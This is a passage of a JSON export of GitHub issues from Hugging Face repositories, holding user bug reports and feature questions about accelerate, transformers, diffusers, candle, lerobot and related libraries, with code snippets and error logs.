    "body": "Hi! When I step through the code line by line, before this line ([entering into `__init__` of `AcceleratorState`](https://github.com/huggingface/accelerate/blob/v0.34.2/src/accelerate/state.py#L856 )) , `PartialState._shared_state`returns\n```\n{}\n```\nBut after entering into `__init__` of `AcceleratorState`, `PartialState._shared_state`returns\n```\n{'_cpu': False, 'backend': 'nccl', 'device': device(type='cuda', index=0), 'debug': False, 'distributed_type': , 'num_processes': 1, 'process_index': 0, 'local_process_index': 0, 'fork_launched': False}\n``` \nI'm wondering where is `PartialState._shared_state` initialized?",
    "url": "https://github.com/huggingface/accelerate/issues/3586",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-23T08:17:44Z",
    "updated_at": "2025-06-30T15:08:15Z",
    "user": "SonicZun"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38300,
    "title": "Will Gemma 3n be added to transformers?",
    "body": "### Model description\n\nQuestion: Are there plans from Google or Huggingface to implement Gemma 3n in other frameworks?\n\nI've seen the LiteRT weights and Android App Link on Huggingface, and was wandering if it would be possible to convert the model architecture in the *.task file to a transformer pytorch Module?\n\nPersonally I'll really interested in the Per-Layer Embeddings and MatFormer implementation they used, but do not have any experience with Tensorflow Lite\n\n### Open source status\n\n- [ ] The model implementation is available\n- [X] The model weights are available\n\n### Provide useful links for the implementation\n\nhttps://huggingface.co/google/gemma-3n-E4B-it-litert-preview",
    "url": "https://github.com/huggingface/transformers/issues/38300",
    "state": "closed",
    "labels": [
      "New model"
    ],
    "created_at": "2025-05-22T15:26:20Z",
    "updated_at": "2025-06-30T07:07:53Z",
    "comments": 4,
    "user": "TheMrCodes"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38281,
    "title": "KeyError in Llama-4-Maverick-17B-128E-Instruct-FP8 Inference with Offloading",
    "body": "### Issue Description\nLoading `meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8` succeeds with `transformers==4.51.0`, but inference fails with `KeyError: 'model.layers.37.feed_forward.experts.gate_up_proj'` during `model.generate`. This occurs on 4x NVIDIA RTX A6000 (~196GB VRAM, CUDA 12.4, Python 3.12.3, Ubuntu 24.04.2) with offloading, critical for sentiment analysis (~100\u2013150GB/day, ~85\u201390% accuracy). Disabling MoE (`num_experts=0`) didn\u2019t resolve it.\n\n### Steps to Reproduce\n1. Install dependencies:\n   ```bash\n   pip install torch==2.4.1 accelerate==1.7.0 compressed-tensors==0.9.4 transformers==4.51.0\n\n2. Confirm model files (~389GB, 84 .safetensors) at /mnt/data/ai_super_palace/models/llama4/.\n\n3. Run:\nimport os\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\nos.environ[\"TORCHVISION_DISABLE_NMS\"] = \"1\"\nmodel = AutoModelForCausalLM.from_pretrained(\n    '/mnt/data/ai_super_palace/models/llama4',\n    torch_dtype=torch.float16,\n    device_map=\"auto\",\n    low_cpu_mem_usage=True,\n    offload_folder=\"/mnt/data/ai_super_palace/models/llama4/offload\",\n    config={\"parallel_style\": \"none\"}\n)\ntokenizer = AutoTokenizer.from_pretrained('/mnt/data/ai_super_palace/models/llama4')\nprompt = \"What is the sentiment of this text: 'I love this product, it's amazing!'\"\ninputs = tokenizer(prompt, return_tensors=\"pt\").to(model.device)\noutputs = model.generate(**inputs, max_new_tokens=50)\nprint(tokenizer.decode(outputs[0], skip_special_tokens=True))\n\n4. Error:\nKeyError: 'model.layers.37.feed_forward.experts.gate_up_proj'\n\n**Environment**\nTransformers: 4.51.0\nPython: 3.12.3\nPyTorch: 2.4.1\nCUDA: 12.4\nAccelerate: 1.7.0\nCompressed-tensors: 0.9.4\nOS: Ubuntu 24.04.2 LTS\nHardware: 4x NVIDIA RTX A6000 (~196GB VRAM)\nModel: meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8\n\n**Additional Details**\nModel card requires transformers>=4.51.0, supports FP8 via compressed-tensors.\nWarnings: Uninitialized MoE weights (feed_forward.experts.*), offloaded parameters (VRAM limit).\nPrior errors (TypeError: NoneType not iterable) resolved with config={\"parallel_style\": \"none\"}.\nSuspect bug in accelerate offloading or MoE weight initialization.\n\n**Request**\nIs this a known llama4 MoE offloading issue?\nCan MoE weights be initialized or offloading fixed?\nWorkaround for inference without re-downloading (~389GB)?\nUrgent for sentiment analysis.\n\n**Logs**\nSee traceback above. config.json (40KB) available.\n\nThank you!\n\n\n\n\n\n\n\n\n\n\n\n\n",
    "url": "https://github.com/huggingface/transformers/issues/38281",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-22T05:45:30Z",
    "updated_at": "2025-07-27T08:03:11Z",
    "comments": 4,
    "user": "pchu2025"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38268,
    "title": "Group beam search with sampling?",
    "body": "### Feature request\n\nIn the current generation code, group beam search is necessarily greedy. From a theoretical point of view, it is not very clear why that should be the case, since the diversity penalty is applied on the logits anyway, yielding a full distribution from which sampling can still be performed.\n\n### Motivation\n\nI think there is a reasonable use case for such a feature: diversity beam search is very useful in particular for modalities like biological sequences which increasingly use the transformers library, but I could see it be useful as well for natural language or code, to generate diverse paths without falling to the drawbacks of greedy generation. From a more abstract point of view it is also seemingly unjustified to allow sampling for standard beam search and not for diversity beam search.\n\n### Your contribution\n\nI am aware of the work in #30810 so don't want to disrupt but would be happy to look into it.",
    "url": "https://github.com/huggingface/transformers/issues/38268",
    "state": "open",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-05-21T18:08:59Z",
    "updated_at": "2025-06-06T18:11:13Z",
    "comments": 4,
    "user": "adrian-valente"
  },
  {
    "repo": "huggingface/candle",
    "number": 2961,
    "title": "Shape Mismatch in MatMul During Forward Pass of ModernBertForSequenceClassification",
    "body": "ModernBertForSequenceClassification model (hidden size = 768, sequence length = 128) to categorize text into one of classes. During the initial training epoch, however, the forward pass fails with a \u201cshape mismatch in matmul\u201d error.\nIs there any way to solve this?\n\n\n #Error log\nTokenized shape: [4, 128]\nAttention mask shape: [4, 128]\nInput IDs shape: [4, 128]\nAttention mask shape: [4, 128]\nFirst sample token count: 128\nError in forward pass: shape mismatch in matmul, lhs: [4, 128], rhs: [768, 768]\nInput shape: [4, 128], Attention mask shape: [4, 128]\nError: shape mismatch in matmul, lhs: [4, 128], rhs: [768, 768]\n\n\n#Expected Behavior\n    Input IDs should be a tensor of shape (batch_size, sequence_length) whose values are token indices (integers) and which the embedding layer then projects into the model\u2019s hidden dimension (hidden_size = 768) before any matrix multiplication with weight matrices of shape (768, 768)\n    The forward pass should succeed without dimension errors, yielding logits of shape (batch_size, num_classes).\n\n\n#Code\n\n```\nuse candle_core::{Device, Tensor, D, DType, Error};\nuse candle_nn::{ops, loss,  VarBuilder, optim::{Optimizer},var_map::VarMap};\nuse candle_transformers::models::modernbert::{ClassifierConfig, ClassifierPooling, ModernBertForSequenceClassification,Config\n};\nuse hf_hub::{api::sync::Api, Repo, RepoType};\nuse tokenizers::{PaddingParams, Tokenizer};\nuse std::collections::HashMap;\nuse candle_optimisers::adam::{ParamsAdam, Adam};\nuse rand::{seq::SliceRandom, SeedableRng};\nuse rand::rngs::StdRng;\n// Training settings\nconst LEARNING_RATE: f64 = 2e-5;\nconst EPOCHS: usize = 5;\nconst BATCH_SIZE: usize = 8;\nconst SEQ_LEN: usize = 128; // Sequence length\nconst SEED: u64 = 42;\n\n// Data structure for text and label mapping\ntype LabeledDataset = HashMap;\n\n\nfn main() -> Result<(), Box> {\n    // Device selection (CPU or GPU)\n    let device = candle_examples::device(true)?;\n    println!(\"Using device: {:?}\", device);\n    \n    // HuggingFace API configuration\n    let revision = \"main\".to_string();\n    let api = Api::new()?;\n    let model_id = \"answerdotai/ModernBERT-base\".to_string();\n    let repo = api.repo(Repo::with_revision(\n        model_id,\n        RepoType::Model,\n        revision,\n    ));\n\n    // Load tokenizer and model configuration\n    let tokenizer_filename = repo.get(\"tokenizer.json\")?;\n    let config_filename = repo.get(\"config.json\")?;\n    let weights_filename = repo.get(\"model.safetensors\")?;\n    \n    // Load configuration file\n    let config = std::fs::read_to_string(config_filename)?;\n    let mut config: Config = serde_json::from_str(&config)?;\n    \n    // Output model configuration\n    println!(\"Model config:\");\n    println!(\"  Hidden size: {}\", config.hidden_size);\n    println!(\"  Intermediate size: {}\", config.intermediate_size);\n    println!(\"  Max position embeddings: {}\", config.max_position_embeddings);\n    println!(\"  Num attention heads: {}\", config.num_attention_heads);\n    println!(\"  Num hidden layers: {}\", config.num_hidden_layers);\n    println!(\"  Vocab size: {}\", config.vocab_size);\n\n    \n    // Check configuration compatibility\n    if config.max_position_embeddings < SEQ_LEN {\n        println!(\"Warning: SEQ_LEN ({}) is larger than max_position_embeddings ({}), adjusting SEQ_LEN\",\n                SEQ_LEN, config.max_position_embeddings);\n    }\n    \n    // Initialize tokenizer\n    let mut tokenizer = 
Tokenizer::from_file(tokenizer_filename).map_err(Error::msg)?;\n    \n    // Padding and truncation settings\n    tokenizer\n        .with_padding(Some(PaddingParams {\n            strategy: tokenizers::PaddingStrategy::Fixed(SEQ_LEN),\n            pad_id: config.pad_token_id,\n            pad_token: \"[PAD]\".to_string(),\n            pad_type_id: 0,\n            pad_to_multiple_of: None,\n            direction: tokenizers::PaddingDirection::Right,\n        }))\n        .with_truncation(Some(tokenizers::TruncationParams {\n            max_length: SEQ_LEN,\n            strategy: tokenizers::TruncationStrategy::LongestFirst,\n            stride: 0,\n            direction: tokenizers::TruncationDirection::Right,\n        }))\n        .map_err(Error::msg)?;\n\n    // Configure label mappings\n    let mut id2label = HashMap::new();\n    let mut label2id = HashMap::new();\n\n    let class_names = vec![\"News\", \"Entertainment\", \"Sports\", \"Technology\"];\n    for (i, name) in class_names.iter().enumerate() {\n        id2label.insert(i.to_string(), name.to_string());\n        label2id.insert(name.to_string(), i.to_string());\n    }\n    \n    // Add classifier configuration\n    config.classifier_config = Some(ClassifierConfig {\n        id2label: id2label.clone(),\n        label2id: label2id.clone(),\n        classifier_pooling: ClassifierPooling::CLS, // Use [CLS] token for pooling\n    });\n\n    // Create variable map for the model\n    let mut varmap = VarMap::new();\n    // Load model weights\n    varmap.load(weights_filename)?;\n    let vb = VarBuilder::from_varmap(&varmap",
    "url": "https://github.com/huggingface/candle/issues/2961",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-21T14:25:07Z",
    "updated_at": "2025-06-08T12:11:46Z",
    "comments": 2,
    "user": "whitebox2"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38243,
    "title": "",
    "body": "We are looking for an experienced Machine Learning Engineer for a BTC/USDT prediction project using CNN, LSTM, and Transformers. The goal is to forecast cryptocurrency price movements with a target accuracy of 90%+.\n\nMore details here:[ ](https://gist.github.com/DandBman/c76a548b1972da50ffe6bbdd93fdd613)",
    "url": "https://github.com/huggingface/transformers/issues/38243",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-20T22:14:11Z",
    "updated_at": "2025-05-21T13:14:41Z",
    "comments": 0,
    "user": "DandBman"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11590,
    "title": "Infinite (not literally) length video creation using LTX-Video?",
    "body": "First of all thanks to Aryan (0.9.7 integration) and DN6 (adding GGUF). Model is quite good and output is also promising.\n\nI need help in creating continuous video using the last frame. 1 trick is to generate the video, extract the last frame and do inference. Is there any easy way where I can do this in loop.\n\nMy thought is \n\n1. Use text encoder to generate prompt embed once and then remove text encoders from memory\n2. Loop the inference code, once complete extract the last latent (preferred as I can upscale using LTXLatentUpsamplePipeline) frame or image and again create image1 and condition with that frame...and continue doing this for n iterations.\n3. Also need to save the video locally for each inference, otherwise OOM.\n\nAny thoughts / suggestions?\n\n```python\nimport torch\nimport gc\nfrom diffusers import GGUFQuantizationConfig\nfrom diffusers import LTXConditionPipeline, LTXLatentUpsamplePipeline, LTXVideoTransformer3DModel\nfrom diffusers.pipelines.ltx.pipeline_ltx_condition import LTXVideoCondition\nfrom diffusers.utils import export_to_video, load_video, load_image\n\ntransformer_path = f\"https://huggingface.co/wsbagnsv1/ltxv-13b-0.9.7-distilled-GGUF/blob/main/ltxv-13b-0.9.7-distilled-Q3_K_S.gguf\"\n# transformer_path = f\"https://huggingface.co/wsbagnsv1/ltxv-13b-0.9.7-distilled-GGUF/blob/main/ltxv-13b-0.9.7-distilled-Q8_0.gguf\"\ntransformer_gguf = LTXVideoTransformer3DModel.from_single_file(\n    transformer_path,\n    quantization_config=GGUFQuantizationConfig(compute_dtype=torch.bfloat16),\n    torch_dtype=torch.bfloat16,\n)\n\npipe = LTXConditionPipeline.from_pretrained(\n    \"Lightricks/LTX-Video-0.9.7-distilled\", \n    transformer=transformer_gguf,\n    torch_dtype=torch.bfloat16\n)\n# pipe.to(\"cuda\")\n# pipe.enable_sequential_cpu_offload()\npipe.enable_model_cpu_offload()\npipe.vae.enable_tiling()\n\nheight, width = 480, 832\nnum_frames = 151\nnegative_prompt = \"worst quality, inconsistent motion, blurry, jittery, distorted\"\n\nprompt = \"hyperrealistic digital artwork of a young woman walking confidently down a garden pathway, wearing white button-up blouse with puffed sleeves and blue denim miniskirt, long flowing light brown hair caught in gentle breeze, carrying a small black handbag, bright sunny day with blue sky and fluffy white clouds, lush green hedges and ornamental plants lining the stone pathway, traditional Asian-inspired architecture in background, photorealistic style with perfect lighting, unreal engine 5, ray tracing, 16K UHD. camera follows subject from front as she walks forward with elegant confidence\"\nimage1 = load_image( \"assets/ltx/00039.png\" )\ncondition1 = LTXVideoCondition(\n    image=image1,\n    frame_index=0,\n)\nwidth=512\nheight=768\nnum_frames = 161\n\n# LOOP HERE\nlatents = pipe(\n    prompt=prompt,\n    negative_prompt=negative_prompt,\n    conditions=[condition1],\n    width=width,\n    height=height,\n    num_frames=num_frames,\n    guidance_scale=1.0,\n    num_inference_steps=4,\n    decode_timestep=0.05,\n    decode_noise_scale=0.025,\n    image_cond_noise_scale=0.0,\n    guidance_rescale=0.7,\n    generator=torch.Generator().manual_seed(42),\n    output_type=\"latent\",\n).frames\n# save video locally\n# Update image1 = load_image( latent/image from current inference  to be used with next inference)\n\n```",
    "url": "https://github.com/huggingface/diffusers/issues/11590",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-20T13:37:36Z",
    "updated_at": "2025-05-20T19:51:20Z",
    "comments": 1,
    "user": "nitinmukesh"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 501,
    "title": "[BUG] Notebook on HF Hub is not updated",
    "body": "\"Workflows in LlamaIndex\" [course page](https://huggingface.co/learn/agents-course/unit2/llama-index/workflows#creating-workflows) is referring notebook on [HF Hub](https://huggingface.co/agents-course/notebooks/blob/main/unit2/llama-index/workflows.ipynb), which is not the updated version from [GitHub](https://github.com/huggingface/agents-course/blob/main/notebooks/unit2/llama-index/workflows.ipynb). \n\nThe old version contains bug in loop event workflow so update is needed. ",
    "url": "https://github.com/huggingface/agents-course/issues/501",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-20T06:45:26Z",
    "updated_at": "2025-05-29T05:28:46Z",
    "user": "karenwky"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 649,
    "title": "how to evaluate use local models and datasets?",
    "body": "I change the readme eval command like following: \n\n**MODEL=./deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B\nMODEL_ARGS=\"pretrained=$MODEL,dtype=bfloat16,max_model_length=32768,gpu_memory_utilization=0.8,generation_parameters={max_new_tokens:32768,temperature:0.6,top_p:0.95}\"\nOUTPUT_DIR=./data/evals/\n\n# AIME 2024\nTASK=aime24\nlighteval vllm $MODEL_ARGS \"custom|$TASK|0|0\" \\\n    --custom-tasks src/open_r1/evaluate.py \\\n    --use-chat-template \\\n    --output-dir $OUTPUT_DIR \\\n    --cache-dir ./datasets/aime24**\n\nbut it try to use the network,and get a network error,how can i do to solve this problem?",
    "url": "https://github.com/huggingface/open-r1/issues/649",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-20T05:57:29Z",
    "updated_at": "2025-05-20T05:57:29Z",
    "user": "SiqingHe"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1130,
    "title": "Drive mode reversed on calibration.",
    "body": "I had an issue where after calibrating drive_mode was reversed for one of my motors (0 vs. 1) as a result, moving the leader in one direction caused the follower to go the opposite direction.\n\nSaw some suggestions that moving it through the full range of motion resolved this but I wasn't able to get that to work. I could also see cases where this could be problematic during initial setup. @Lemin2 suggested to always set this to 0 across the board, which does seem like a good fix, unless there's a reason want to control reverse mode. \n\nIn any case I would expect the calibration process to be consistent for both arms, else this issue will be encountered. If reverse mode is needed maybe have a step in the calibration processes to ensure consistency.\n\nFYI in case anyone encounters this the solution is to go into `.cache/calibration//.json`\n\nSeems to be the same cause for #441 and #930 ",
    "url": "https://github.com/huggingface/lerobot/issues/1130",
    "state": "open",
    "labels": [
      "bug",
      "question",
      "robots"
    ],
    "created_at": "2025-05-20T03:08:06Z",
    "updated_at": "2025-07-16T06:50:20Z",
    "user": "brainwavecoder9"
  },
  {
    "repo": "huggingface/text-generation-inference",
    "number": 3233,
    "title": "Docker image For llama cpp backend?",
    "body": "Hey,\nIs there any reason in particular why docker images for the llama-cpp backend do not get built along with new versions? It seems the backend has been ready for a while so just curious why images don't get built as part of the build pipeline\ncc @mfuntowicz ",
    "url": "https://github.com/huggingface/text-generation-inference/issues/3233",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-20T02:07:46Z",
    "updated_at": "2025-05-20T02:07:46Z",
    "comments": 0,
    "user": "vrdn-23"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11580,
    "title": "Can diffusers support loading and running FLUX with fp8 ?",
    "body": "This is how I use diffusers to load flux model:\n```\nimport torch\nfrom diffusers import FluxPipeline\npipe = FluxPipeline.from_pretrained(\n    \"/ckptstorage/repo/pretrained_weights/black-forest-labs/FLUX.1-dev\", \n    torch_dtype=torch.float16,\n)\ndevice = torch.device(f\"cuda:{device_number}\" if torch.cuda.is_available() else \"cpu\")\npipe = pipe.to(device)\n```\nit consumes about 75 seconds on my computer with A800 GPU.\nBut I found in comfyui, it only need 22 seconds to load flux model, but it load the fp8 model.\nCan diffusers load flux fp8 model ?\nor is there any other speed up method ?",
    "url": "https://github.com/huggingface/diffusers/issues/11580",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-19T12:18:13Z",
    "updated_at": "2025-12-12T19:30:33Z",
    "comments": 5,
    "user": "EmmaThompson123"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1124,
    "title": "How to add force data to lerobot and models?",
    "body": "As title said, I use a force sensor on SO100 arm and want to record the data in lerobot dataset then train with the force data. How to do it?\n\nforce data looks like: a list: [x1, y1, z1, x2, y2, z2, x3, y3, z3, x4, y4, z4, x5, y5, z5] (15 d list)\n\nThanks!",
    "url": "https://github.com/huggingface/lerobot/issues/1124",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-19T07:48:20Z",
    "updated_at": "2025-05-19T13:36:44Z",
    "user": "milong26"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11575,
    "title": "Hidream Model loading takes too long \u2014 any way to speed it up?",
    "body": "Hi, thanks for this great project.\n\nI'm running Hidream with this library in a serverless environment and facing major delays during model loading. It can be very frustrating, especially for time-sensitive or ephemeral deployments.\n\nI've tried everything I could think of to reduce the loading time, but nothing has worked so far. Does anyone have any tips, tricks, or even sample code to help speed up the model initialization?\n\nAny guidance would be greatly appreciated!",
    "url": "https://github.com/huggingface/diffusers/issues/11575",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-19T00:49:00Z",
    "updated_at": "2025-05-23T12:55:05Z",
    "comments": 6,
    "user": "Me-verner"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2275,
    "title": "ONNX export for ColPali",
    "body": "Hi Optimum,\n\nI have created a small tutorial how to export the ColPali late-interaction VLM in this [notebook](https://gist.github.com/kstavro/9bcdf930f0e69626dd5aa9aa5f09f867), but I think it shouldn't be too difficult to integrate it to Optimum as well.\n\nHowever, as far as I have seen, there is not much support for late-interaction VLMs at the moment. So, before I get into it just by myself, I thought I could first see if someone could give me a couple of hints about some choices regarding the library, eg what base configs I should use for ColPali or if I should create new ones everywhere, what names, do we need tiny dummy models for tests, etc.",
    "url": "https://github.com/huggingface/optimum/issues/2275",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-18T18:56:22Z",
    "updated_at": "2025-06-11T13:56:43Z",
    "comments": 2,
    "user": "kstavro"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38190,
    "title": "Gibberish generations with FSDP2 and MixedPrecisionPolicy",
    "body": "### System Info\n\n```\ntransformers.__version__='4.51.2'\ntorch.__version__='2.6.0+cu124'\nsys.version='3.10.17 (main, Apr 16 2025, 15:03:57) [GCC 12.1.1 20220628 (Red Hat 12.1.1-3)]'\n```\n\n### Who can help?\n\n@SunMarc @zach-huggingface\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nI'm sharding `llama-3.1-8b-instruct` on 8 GPUs using FSDP2. The goal is to be able to call `generate` during the training loop. I have noticed that If I use `MixedPrecisionPolicy` with `param_dtype=torch.bfloat16` the generations are gibberish. A hopefully reproducible example below.\n\n\n```python\nimport os\n\nimport torch\nimport torch.distributed as dist\nfrom torch.distributed._composable.fsdp import register_fsdp_forward_method\nfrom torch.distributed.device_mesh import init_device_mesh\nfrom torch.distributed.fsdp import (\n    MixedPrecisionPolicy,\n    fully_shard,\n)\nfrom transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer\nfrom transformers.models.llama.modeling_llama import LlamaDecoderLayer\n\n\n\ndef get_local_rank() -> int:\n    return int(os.environ.get(\"LOCAL_RANK\", \"0\"))\n\n\ndef get_global_rank() -> int:\n    return int(os.environ.get(\"RANK\", get_local_rank()))\n\n\ndef barrier():\n    dist.barrier(device_ids=[get_local_rank()])\n\n\ndef test_generate(model, tokenizer):\n    prompt = \"Concisely answer the following question: \"\n    queries = [\n        \"What is the tallest animal?\\n\",\n        \"What are 3 fruits larger in size than an apple?\\n\",\n        \"What's the derivative of e^x?\\n\",\n    ]\n\n    tokens = [tokenizer.encode(prompt + q) for q in queries]\n    max_len = max(len(t) for t in tokens)\n    padded = [[tokenizer.eos_token_id] * (max_len - len(t)) + t for t in tokens]\n    padded_t = torch.tensor(padded).long()\n\n    generations = model.generate(padded_t, max_new_tokens=128)\n    parsed = tokenizer.batch_decode(generations)\n    for p in parsed:\n        print(p, flush=True)\n\n\ndef main():\n    device = torch.device(\"cuda\", get_local_rank())\n    dist.init_process_group(\n        backend=\"nccl\",\n    )\n    torch.cuda.set_device(device)\n\n    LOCAL_MODEL_PATH = \"/llama-3.1-8b-instruct\"\n\n    tokenizer = AutoTokenizer.from_pretrained(LOCAL_MODEL_PATH)\n    model_config = AutoConfig.from_pretrained(LOCAL_MODEL_PATH)\n    model = AutoModelForCausalLM.from_pretrained(\n        LOCAL_MODEL_PATH,\n        config=model_config,\n        use_safetensors=True,\n        torch_dtype=torch.float32,\n    )\n\n    fsdp2_kwargs = {}\n    fsdp2_kwargs[\"mesh\"] = init_device_mesh(\n        \"cuda\", (torch.distributed.get_world_size(),)\n    )\n    fsdp2_kwargs[\"mp_policy\"] = MixedPrecisionPolicy(\n        param_dtype=torch.bfloat16,   # <<<----- If I comment this line the generations are as expected\n    )\n\n    for submodule in model.modules():\n        if isinstance(submodule, LlamaDecoderLayer):\n            fully_shard(submodule, **fsdp2_kwargs)\n    fully_shard(model, **fsdp2_kwargs)\n    register_fsdp_forward_method(model, \"generate\")\n\n    barrier()\n\n    test_generate(model, tokenizer)\n\n    barrier()\n\n    dist.destroy_process_group()\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\nThe following  is an example of the output I get if 
`param_dtype=torch.bfloat16`:\n\n```\n<|eot_id|><|eot_id|><|eot_id|><|eot_id|><|eot_id|><|eot_id|><|begin_of_text|>Concisely answer the following question: What is the tallest animal?\nThe odense aalborg limburg fetisch odense fetisch<|start_header_id|>OO\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\n<|begin_of_text|>Concisely answer the following question: What are 3 fruits larger in size than an apple?\nHere fetisch<|start_header_id|>OOOOOOOOOO\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\n<|eot_id|><|eot_id|><|eot_id|><|begin_of_text|>Concisely answer the following question: What's the derivative of e^x?\nThe aalborg salopes<|start_header_id|>OOOOOOOOOOOOAAAAAAAA\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n\n### Expected behavior\n\nThe following is an example of the output I get if I comment out the `param_dtype=torch.bfloat16` in `MixedPrecisionPolicy`\n\n```\n<|eot_id|><|eot_id|><|eot_id|><|eot_id|><|eot_id|><|eot_id|><|begin_of_text|>Concisely answer the following question: What is the tallest animal?\nThe tallest animal is the giraffe, which can grow up to 18 feet (5.5 meters) tall.\nThe gi",
    "url": "https://github.com/huggingface/transformers/issues/38190",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-18T11:56:08Z",
    "updated_at": "2025-08-29T09:36:57Z",
    "comments": 17,
    "user": "dlvp"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38181,
    "title": "Add a way for `callbacks` to get `trainer` handler",
    "body": "When I want to implement differential privacy for the model, I customize the gradient clipping before `optimizer.step()`. The add custom noise to the model after `optimizer.step()`. I cannot get `Trainer.optimizer` in the `callback` function, it shows as `None`. Is it possible to get the reference of `Trainer` directly in `callback`?",
    "url": "https://github.com/huggingface/transformers/issues/38181",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-16T16:01:35Z",
    "updated_at": "2025-05-19T12:17:06Z",
    "comments": 1,
    "user": "MinzhiYoyo"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 645,
    "title": "How to set vllm max-model-len?",
